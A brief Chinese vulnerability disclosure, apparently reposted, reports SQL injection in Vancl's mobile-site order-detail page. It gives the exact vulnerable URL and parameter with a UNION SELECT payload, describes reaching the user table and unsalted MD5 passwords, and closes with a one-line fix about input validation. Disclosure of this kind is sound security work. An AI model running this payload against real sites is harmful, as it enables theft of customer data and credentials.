注入点在: http://m.vancl.com/ 注入地址: http://m.vancl.com/order/GetOrderDetail/.m vc ?orderid=orderid and 1=2 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3--&guid=guid 上面地址中: orderid 和guid 就不提供了 可以直接union 查询库,www.2cto.com 而且是用户表和网站的没有分离,唉,作为这么大的站,用户信息的表怎么也得分离吧?不分离,只要有一个注入点,用户资料不就完了? 失望了。。。 这里只查了自己的号,密码是md5,弱呀。。。 修复方案: 加强输入参数验证检查 作者 Jannock
查看更多关于凡客诚品手机版SQL注射及修复方案 - 网站安全的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did12061